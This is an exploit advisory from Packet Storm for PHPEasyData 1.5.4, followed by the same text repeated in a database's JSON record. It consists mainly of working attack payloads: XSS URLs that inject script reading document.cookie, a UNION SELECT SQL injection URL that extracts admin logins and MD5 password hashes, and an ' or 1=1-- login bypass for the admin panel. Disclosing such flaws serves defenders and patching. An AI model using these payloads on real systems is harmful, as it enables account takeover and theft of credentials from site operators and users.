Search...

phpeasydata-sqlxss.txt

2008-06-11T00:00:00

ID PACKETSTORM:67187
Type packetstorm
Reporter Sylvain THUAL
Modified 2008-06-11T00:00:00

Description

                                        
                                            `-------------  
*PHPEasyData*  
-------------  
  
Informations :  
**************   
Langage : PHP  
Version : 1.5.4  
Website : http://www.phpeasydata.com/  
Problems : Multiple vulnerabilities  
  
Description:  
************  
PHPEasyData is a PHP application which allow you to manage and display on the web your dynamics data and directories.  
  
Details :  
*********  
---------  
** Xss **  
---------  
  
There are multiple xss vulnerabilities.  
Demonstration exploit URL:  
  
-last_records.php:  
http://[website]/last_records.php?annuaire=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
-annuaire.php:  
http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=&by=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
http://[website]/annuaire.php?annuaire=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
  
-------------------  
** SQL Injection **  
-------------------  
-annuaire.php  
http://[website]/annuaire.php?annuaire=29%20union%20select%20user_pass,user_login,user_fname,user_access%20from%20an_users  
  
With this url we can have the admin password(crypted with md5) for example.  
  
-admin/login.php  
Due to a lack of sanitization of the user input in admin/login.php we can easily get an access to the admin control panel with the login:  
' or 1=1-- /**   
  
  
Credits:  
********  
Autor : Sylvain THUAL   
E-mail : contact@click-internet.fr  
Website : http://www.click-internet.fr  
  
`

JSON Vulners Source

Initial Source

{"sourceHref": "https://packetstormsecurity.com/files/download/67187/phpeasydata-sqlxss.txt", "sourceData": "`------------- \n*PHPEasyData* \n------------- \n \nInformations : \n************** \nLangage : PHP \nVersion : 1.5.4 \nWebsite : http://www.phpeasydata.com/ \nProblems : Multiple vulnerabilities \n \nDescription: \n************ \nPHPEasyData is a PHP application which allow you to manage and display on the web your dynamics data and directories. \n \nDetails : \n********* \n--------- \n** Xss ** \n--------- \n \nThere are multiple xss vulnerabilities. \nDemonstration exploit URL: \n \n-last_records.php: \nhttp://[website]/last_records.php?annuaire=%3Cscript%3Ealert(document.cookie)%3C/script%3E \n \n-annuaire.php: \nhttp://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=&by=%3Cscript%3Ealert(document.cookie)%3C/script%3E \n \nhttp://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=%3Cscript%3Ealert(document.cookie)%3C/script%3E \n \nhttp://[website]/annuaire.php?annuaire=%3Cscript%3Ealert(document.cookie)%3C/script%3E \n \n \n------------------- \n** SQL Injection ** \n------------------- \n-annuaire.php \nhttp://[website]/annuaire.php?annuaire=29%20union%20select%20user_pass,user_login,user_fname,user_access%20from%20an_users \n \nWith this url we can have the admin password(crypted with md5) for example. \n \n-admin/login.php \nDue to a lack of sanitization of the user input in admin/login.php we can easily get an access to the admin control panel with the login: \n' or 1=1-- /** \n \n \nCredits: \n******** \nAutor : Sylvain THUAL \nE-mail : contact@click-internet.fr \nWebsite : http://www.click-internet.fr \n \n`\n", "edition": 1, "references": [], "modified": "2008-06-11T00:00:00", "hash": "761f145a48b78d0cd202d683b6f572bb39bc204b2e3d4beb390e356f09189b3a", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/67187/phpeasydata-sqlxss.txt.html", "description": "", "id": "PACKETSTORM:67187", "reporter": "Sylvain THUAL", "lastseen": "2016-11-03T10:18:22", "published": "2008-06-11T00:00:00", "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:18:22"}, "dependencies": {"references": [], "modified": "2016-11-03T10:18:22"}, "vulnersScore": -0.4}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "phpeasydata-sqlxss.txt", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "31c4d03e0ac873a499716a2ceec0030a", "key": "href"}, {"hash": "965e3ccd3c7b292c9809fb46fe3e237d", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "965e3ccd3c7b292c9809fb46fe3e237d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "cc7d0e30c0c68a7bbe89cd6685cd42c4", "key": "reporter"}, {"hash": "6273c30078392722f206e5465dbb1d4d", "key": "sourceData"}, {"hash": "d6a33b128bea7f0da7b2091e2564dc02", "key": "sourceHref"}, {"hash": "bcd48fed9cfac08f7cf5e06e827de823", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}